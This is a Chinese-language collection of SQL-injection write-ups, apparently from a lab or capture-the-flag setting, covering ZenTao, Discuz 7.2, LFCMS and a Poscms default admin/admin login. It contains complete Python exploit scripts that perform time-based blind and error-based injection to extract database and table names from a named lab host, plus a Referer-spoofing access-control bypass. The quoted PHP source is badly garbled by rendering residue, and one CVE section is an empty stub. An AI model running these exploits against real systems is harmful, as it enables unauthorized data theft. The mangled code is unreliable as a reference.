sql注入合集_禅道sql注入(1),网络安全开发究竟该如何学习

class block extends control
{
// Constructor of the block controller. (The text of this listing was mangled by
// the page's math renderer; the calls that survive are commented on below.)
public function __construct($moduleName = ‘’, KaTeX parse error: Expected '}', got 'EOF' at end of input: …:\_\_construct(moduleName, $methodName);
// SECURITY NOTE: selfCall is derived from the Referer header
// (strpos($this->server->http_referer, common::getSysURL()) === 0) or from a
// blockModule session flag. Referer is client-controlled, so this is not an
// access-control boundary: any caller can send a Referer that starts with the
// site URL and skip the die('') below. The final condition ("…ey()") is cut off
// in this excerpt — presumably a secret-key check; confirm against the source.
// The same line also carries the start of main($module = '', $id = 0).
t h i s − > s e l f C a l l = s t r p o s ( this->selfCall = strpos( this>selfCall=strpos(this->server->http_referer, common::getSysURL()) === 0 || t h i s − > s e s s i o n − > b l o c k M o d u l e ; i f ( this->session->blockModule; if( this>session>blockModule;if(this->methodName != ‘admin’ and t h i s − > m e t h o d N a m e ! = ′ d a s h b o a r d ′ a n d ! this->methodName != 'dashboard' and ! this>methodName!=dashboardand!this->selfCall and !KaTeX parse error: Expected 'EOF', got '}' at position 46: …ey()) die(''); }̲ public functio…module = ‘’, $id = 0)
{

// mode is read straight from the query string (?mode=...) and lower-cased.
m o d e = s t r t o l o w e r ( mode = strtolower( mode=strtolower(this->get->mode);
// The getblocklist branch is empty here; getblockdata is the path of interest.
if( m o d e = = ′ g e t b l o c k l i s t ′ ) e l s e i f ( mode == 'getblocklist') { } elseif( mode==getblocklist)elseif(mode == ‘getblockdata’)
{
// blockid (query string) selects which print*Block method runs below.
c o d e = s t r t o l o w e r ( code = strtolower( code=strtolower(this->get->blockid);

// SECURITY NOTE: param is base64-encoded JSON taken from the query string.
// It is decoded with no schema or type validation and stored as
// $this->params, i.e. every field the print*Block methods read from it
// (orderBy, num, type, viewType) is attacker-controlled.
$params = $this->get->param;
p a r a m s = j s o n _ d e c o d e ( b a s e 64 _ d e c o d e ( params = json\_decode(base64\_decode( params=json_decode(base64_decode(params));
t h i s − > v i e w T y p e = ( i s s e t ( this->viewType = (isset( this>viewType=(isset(params->viewType) and $params->viewType == ‘json’) ? ‘json’ : ‘html’;
$this->params = $params;
$this->view->code = $this->get->blockid;

// Dynamic dispatch: 'print' . ucfirst($code) . 'Block', so blockid=case
// resolves to printCaseBlock(). method_exists('block', ...) limits the
// reachable methods to the print*Block family, but does nothing about the
// unchecked $params they receive.
f u n c = ′ p r i n t ′ . u c f i r s t ( func = 'print' . ucfirst( func=print.ucfirst(code) . ‘Block’;
if(method_exists(‘block’, $func))
{
t h i s − > this-> this>func($module);
}
else
{
// Fallback: the same name is looked up on the block model instead.
$this->view->data = t h i s − > b l o c k − > this->block-> this>block>func($module, $params);
}
}
}

构造函数先根据 Referer 判断 selfCall:只要 Referer 以站点 URL 开头(或 session 中带有 blockModule)就放行,否则直接 die()。但 Referer 是客户端可控的请求头,攻击者自己带上一个指向站点的 Referer 即可通过(下文利用脚本的 headers 里就是这么做的),因此这一步并不构成有效的访问控制。随后 main() 以 mode=getblockdata 进入分支,传入 blockid=case 时经 'print' . ucfirst($code) . 'Block' 拼接后动态调用 printCaseBlock() 函数;而 param 参数经 base64 + json 解码后未做任何校验就赋给了 $this->params。

// Renders the "case" dashboard block. Every value it reads from $this->params
// comes from the base64/JSON `param` query parameter decoded in main() without
// validation.
public function printCaseBlock()
{
// The assigntome branch is empty in this excerpt (presumably elided).
if($this->params->type == ‘assigntome’)
{

}
elseif($this->params->type == ‘openedbyme’)
{
// SECURITY NOTE: $this->params->orderBy and $this->params->num are passed
// straight into DAO::orderBy() and DAO::limit(). orderBy() is the function
// with the injection (see below); type=openedbyme is what reaches it.
$cases = t h i s − > d a o − > f i n d B y O p e n e d B y ( this->dao->findByOpenedBy( this>dao>findByOpenedBy(this->app->user->account)->from(TABLE_CASE)
->andWhere(‘deleted’)->eq(0)
->orderBy( t h i s − > p a r a m s − > o r d e r B y ) − > b e g i n I F ( this->params->orderBy) ->beginIF( this>params>orderBy)>beginIF(this->viewType != ‘json’)->limit($this->params->num)->fi()
->fetchAll();
}
// NOTE: with any other type value $cases is never assigned before this line.
$this->view->cases = $cases;
}

printCaseBlock() 只检查 $this->params->type:传入 openedbyme 即进入对应分支,其中 $this->params->orderBy 与 $this->params->num 未经任何过滤,直接传给 DAO 的 orderBy() 和 limit()——orderBy() 就是存在注入的函数。

// Appends an ORDER BY clause built from a caller-supplied string.
// SECURITY NOTE: only the part of $order *before* the first "limit" is
// validated; everything from "limit" onwards ($limit) is appended verbatim.
public function orderBy(KaTeX parse error: Expected '}', got 'EOF' at end of input: order) { if(this->inCondition and !$this->conditionIsTrue) return $this;

// '|' and '_' are turned into spaces, then the string is split at the first
// (case-insensitive) "limit".
$order = str_replace(array(‘|’, ‘’, ‘_’), ’ ‘, $order);
p o s = s t r i p o s ( pos = stripos( pos=stripos(order, ‘limit’);
$orders = p o s ? s u b s t r ( pos ? substr( pos?substr(order, 0, $pos) : $order;
// $limit keeps the raw tail starting at "limit" — it is never checked again.
$limit = p o s ? s u b s t r ( pos ? substr( pos?substr(order, $pos) : ‘’;
o r d e r s = t r i m ( orders = trim( orders=trim(orders);
// The regex (cut off here) whitelists "field [asc|desc], ..." for $orders only;
// anything else aborts the request with die().
if(empty($orders)) return KaTeX parse error: Undefined control sequence: \w at position 27: …reg\_match('/^(\̲w̲+\.)?(`\w+`|\w+…/i’, $orders)) die(“Order is bad request, The order is $orders”);

// Each "table.field dir" element of $orders gets its field name back-quoted.
$orders = explode(‘,’, o r d e r s ) ; f o r e a c h ( orders); foreach( orders);foreach(orders as $i => $order)
{
KaTeX parse error: Double superscript at position 24: …se = explode(' '̲, trim(order));
foreach($orderParse as $key => $value)
{
v a l u e = t r i m ( value = trim( value=trim(value);
if(empty( v a l u e ) o r s t r t o l o w e r ( value) or strtolower( value)orstrtolower(value) == ‘desc’ or strtolower($value) == ‘asc’) continue;

$field = KaTeX parse error: Undefined control sequence: \* at position 9: value; /\̲*̲ such as t1.id …value, ‘.’) !== false) list($table, $field) = explode(‘.’, f i e l d ) ; i f ( s t r p o s ( field); if(strpos( field);if(strpos(field, '') === false) $field = "$field`";

o r d e r P a r s e [ orderParse[ orderParse[key] = isset($table) ? $table . ‘.’ . $field : f i e l d ; u n s e t ( field; unset( field;unset(table);
}
o r d e r s [ orders[ orders[i] = join(’ ‘, o r d e r P a r s e ) ; i f ( e m p t y ( orderParse); if(empty( orderParse);if(empty(orders[ i ] ) ) u n s e t ( i])) unset( i]))unset(orders[$i]);
}
// INJECTION POINT: the unvalidated $limit tail is concatenated back here ...
$order = join(’,', $orders) . ’ ’ . $limit;

// ... and becomes part of the executed SQL.
$this->sql .= ’ ’ . DAO::ORDERBY . " $order";
return $this;
}

orderBy() 先把 order 中的 |、_ 替换为空格,再以第一次出现的 limit 为界把字符串切成两段:前半段 $orders 必须通过正则校验(不通过就 die()),并逐字段加反引号处理;但后半段 $limit(从 limit 起到末尾的全部内容)没有任何校验或转义,最后被原样拼回 ORDER BY 语句执行,注入点就在 limit 之后。下面的 payload 用 `limit 1;select ...` 堆叠第二条语句,这要求数据库驱动允许多语句执行(需结合目标环境确认);末尾的 `-- ` 把框架随后拼接的内容注释掉。

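"""Build the base64-encoded ``param`` value for the ZenTao blind-injection probe.

The block controller decodes ``param`` with base64_decode() + json_decode() and
hands ``orderBy`` to DAO::orderBy(), which appends everything after ``limit`` to
the SQL unvalidated. The original literal used typographic quotes (a syntax
error); it is restored to plain ASCII here.
"""
import base64

# Stacked query: "order limit 1" terminates the ORDER BY clause, the second
# statement sleeps 5 s when ascii(first char of database()) > 0 — i.e. always,
# which makes this a sanity probe that the injected SQL actually runs.
# The trailing "-- " comments out whatever the framework appends afterwards.
payload = (
    b'{"orderBy":"order limit 1;select (if(ascii(substr((select database()),1,1))'
    b'>0,sleep(5),1))-- ","num":"1,1","type":"openedbyme"}'
)
base64encode_str = base64.b64encode(payload)
print(base64encode_str)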


响应耗时超过 5 秒(与 payload 中的 sleep(5) 一致),说明堆叠的第二条语句确实被执行了。下面的脚本据此把响应时间当作布尔盲注的 oracle,阈值取 3 秒以区分正常响应和 sleep(5)。

import base64
import json
import os
import time

import requests
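# --- target / session configuration -----------------------------------------
# SECURITY NOTE: the original script embedded live session cookies (sid,
# PHPSESSID, ...) and the lab host in source. Session identifiers are
# credentials; keep them out of version control and inject them at run time.
BASE_URL = os.environ.get("ZENTAO_URL", "http://110.40.154.212:8081")
COOKIE = os.environ.get("ZENTAO_COOKIE", "")  # e.g. "sid=...; PHPSESSID=..."

# block::__construct() sets selfCall from
# strpos($_SERVER['HTTP_REFERER'], common::getSysURL()) === 0 and die()s when it
# is false, so the Referer only has to *begin* with the site's own URL.
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0",
    "Referer": BASE_URL + "/index.php?m=block&f=main",
}
if COOKIE:
    headers["Cookie"] = COOKIE

SLEEP_SECONDS = 5        # delay the payload asks MySQL for when the condition holds
THRESHOLD_SECONDS = 3    # round-trip above this is read as "condition true"
MAX_NAME_LENGTH = 87     # original scan bound (range(1, 88))


def build_param(position: int, threshold: int) -> str:
    """Return the base64 ``param`` whose orderBy sleeps when
    ascii(substr(database(), position, 1)) > threshold.

    The JSON is emitted without whitespace so the bytes match the original
    hand-written literal; json_decode() on the server does not care either way.
    """
    order_by = (
        "order limit 1;select (if(ascii(substr((select database()),"
        f"{position},1))>{threshold},sleep({SLEEP_SECONDS}),1))-- "
    )
    doc = {"orderBy": order_by, "num": "1,1", "type": "openedbyme"}
    raw = json.dumps(doc, separators=(",", ":")).encode("utf-8")
    return base64.b64encode(raw).decode("utf-8")


def char_greater_than(session, position: int, threshold: int) -> bool:
    """One timing-oracle request; True when the server took longer than THRESHOLD_SECONDS."""
    url = (
        f"{BASE_URL}/index.php?m=block&f=main&mode=getblockdata&blockid=case"
        f"&param={build_param(position, threshold)}"
    )
    started = time.monotonic()
    # Timeout well above the sleep so a slow-but-correct answer is not lost.
    session.get(url, headers=headers, timeout=SLEEP_SECONDS * 4)
    return time.monotonic() - started > THRESHOLD_SECONDS


def extract_database_name() -> str:
    """Recover database() one character at a time by binary search over 0..127."""
    session = requests.Session()
    result = ""
    for position in range(1, MAX_NAME_LENGTH + 1):
        low, high = 0, 128
        while low < high:
            mid = (low + high) // 2
            if char_greater_than(session, position, mid):
                low = mid + 1
            else:
                high = mid
        # substr() past the end of the name returns '' and ascii('') is 0:
        # the original appended chr(0) and kept probing all 87 positions.
        if low == 0:
            break
        result += chr(low)
        print(result)
    return result


if __name__ == "__main__":
    print(extract_database_name())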


八、Discuz7.2

// Joins an array of ids into a quoted, comma-separated SQL list: '1','2','3'.
// SECURITY NOTE: the quoting here is purely cosmetic — elements are not
// escaped by this function. If an element already contains an escaped quote
// (\', as produced when gids[9]=' passes through the global escaping), that
// backslash neutralises the element's own closing quote and the following
// element is emitted unquoted into the SQL. See the payload below.
function implodeids(KaTeX parse error: Expected '}', got 'EOF' at end of input: …y) { if(!empty(array)) {
return “'”.implode(“‘,’”, is_array($array) ? a r r a y : a r r a y ( array : array( array:array(array)).“'”;
} else {
// Empty input yields an empty string (callers presumably build "IN ()" around it).
return ‘’;
}
}

漏洞成因是 implodeids() 把 $groupids 数组用逗号拼接成 '1','2','3','4' 这样的字符串返回。传入的 gids[9]=' 经全局转义后变成 \',被 implodeids() 包上引号后形如 '\','...':这个反斜杠把本该闭合该元素的单引号转义掉了,于是紧随其后的元素(本例中 gids[10][0] 的内容)脱离了引号,直接拼进了 SQL——也就是下面 payload 中 `) and updatexml(...)` 得以执行的原因。


payload如下:

import os
import re

import requests

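# Error-based injection: MySQL echoes the selected value inside its
# "XPATH syntax error" message, so no timing oracle is needed.
# The target host is configurable; the original hard-coded a lab IP.
BASE_URL = os.environ.get("DISCUZ_URL", "http://110.40.154.212:8041")

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0",
}

# gids[9]=' becomes \' after escaping; implodeids() then wraps the ids as
# '...','...' and that backslash swallows the element's closing quote, so the
# next element (gids[10][0]) lands unquoted in the SQL.
VULN_PATH = "/faq.php?action=grouppermission&gids[9]=%27&gids[10][0]="

# updatexml() puts the leaked value between 0x7e ('~') markers on both sides;
# the extraction regex below keys on them. Swap PAYLOAD_TABLE for
# PAYLOAD_DATABASE to read database() instead.
PAYLOAD_DATABASE = ")%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),1)--+"
PAYLOAD_TABLE = (
    ")%20and%20updatexml(1,concat(0x7e,(select%20table_name from information_schema.tables "
    "where table_schema=database() limit 1,1),0x7e),1)--+"
)

# The original pattern had lost its group name to HTML stripping ("(?P.*?)"),
# which re.compile() rejects, and then called .group("name"). updatexml()
# truncates long values, so the closing '~' is optional.
LEAK_PATTERN = re.compile(r"XPATH syntax error: '~(?P<name>[^']*?)~?'")


def extract_leak(body: str) -> "str | None":
    """Return the value updatexml() leaked into the error page, or None if absent."""
    match = LEAK_PATTERN.search(body)
    return match.group("name") if match else None


def main() -> None:
    """Fetch the faulting page and print the leaked table name."""
    s = requests.session()
    resp = s.get(BASE_URL + VULN_PATH + PAYLOAD_TABLE, headers=headers, timeout=30)
    leaked = extract_leak(resp.text)
    if leaked is None:
        # The original crashed with AttributeError on None here.
        print("no XPATH syntax error in the response; injection blocked or page layout differs")
    else:
        print(leaked)


if __name__ == "__main__":
    main()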

九、Poscms


弱口令:后台使用默认账号 admin / 密码 admin 即可直接登录。

十、LFCMS


import os
import time

import requests

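# SECURITY NOTE: the original embedded a live admin session
# (finecms-admin-login=admin, PHPSESSID=..., member_cookie=...) and the lab host
# in source. Those are credentials; supply them through the environment.
BASE_URL = os.environ.get("LFCMS_URL", "http://110.40.154.212:8070")
COOKIE = os.environ.get("LFCMS_COOKIE", "")

headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0",
}
if COOKIE:
    headers["Cookie"] = COOKIE

SLEEP_SECONDS = 5       # delay requested from MySQL when the guess is wrong
THRESHOLD_SECONDS = 3   # round-trip above this counts as "slept"
MAX_POSITIONS = 9       # original bound: range(1, 10)
MAX_CODE = 130          # original bound: candidate ASCII codes 1..129


def build_url(position: int, candidate: int) -> str:
    """URL whose `category` parameter sleeps unless ORD(MID(database(), position, 1)) == candidate.

    STRCMP(a, b) is 0 only when the two compare equal, so sleep() runs on the
    *mismatch* branch: a fast answer means `candidate` is the right code.
    """
    return (
        f"{BASE_URL}/index.php/Ajax/randMovie?limit=1&category=1%20AND%20(SELECT%208586%20FROM%20"
        f"(SELECT(if(STRCMP({candidate},ORD(MID((SELECT%20DATABASE()),{position},1))),"
        f"sleep({SLEEP_SECONDS}),1)))YVDz)"
    )


# To enumerate table names instead of the database name, replace the inner
# SELECT DATABASE() with:
#   (select table_name from information_schema.tables where table_schema=database() limit 0,1)


def guess_is_correct(position: int, candidate: int) -> bool:
    """One timing-oracle request; True when the server answered without sleeping."""
    started = time.monotonic()
    requests.get(build_url(position, candidate), headers=headers, timeout=SLEEP_SECONDS * 4)
    return time.monotonic() - started <= THRESHOLD_SECONDS


def extract_database_name() -> str:
    """Linear-search each character of database() over ASCII codes 1..MAX_CODE-1."""
    flag = ""
    for position in range(1, MAX_POSITIONS + 1):
        for candidate in range(1, MAX_CODE):
            if guess_is_correct(position, candidate):
                flag += chr(candidate)
                break
            time.sleep(1)  # pause between probes, as the original did
        else:
            # No code matched: MID() past the end returns '' (ORD 0), so the
            # name is complete. The original kept probing every remaining
            # position at ~MAX_CODE * SLEEP_SECONDS each.
            break
        print(flag)
    return flag


if __name__ == "__main__":
    print(extract_database_name())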


十一、CVE-2022-0760

import requests
import time

这里(CVE-2022-0760)没有重新分析注入点,直接假设 flag 与上一个 SQL 注入案例中存放的位置相同,沿用同样的盲注方式读取;脚本正文在原文中未给出。

